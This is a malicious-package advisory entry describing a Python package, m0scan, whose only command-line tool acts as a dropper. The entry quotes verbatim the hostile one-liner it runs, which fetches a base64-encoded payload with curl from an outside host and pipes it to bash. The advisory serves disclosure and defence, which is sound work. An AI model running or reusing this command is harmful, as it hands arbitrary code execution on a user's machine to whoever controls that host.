MAL-2026-4812

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2) The package's sole console_script `m0scan` (m0scan/main.py:6-7) executes `curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash`, fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host (`mspy.qzz.io`) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls `mspy.qzz.io/M0scan` controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author `M-AT-STAR`, generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.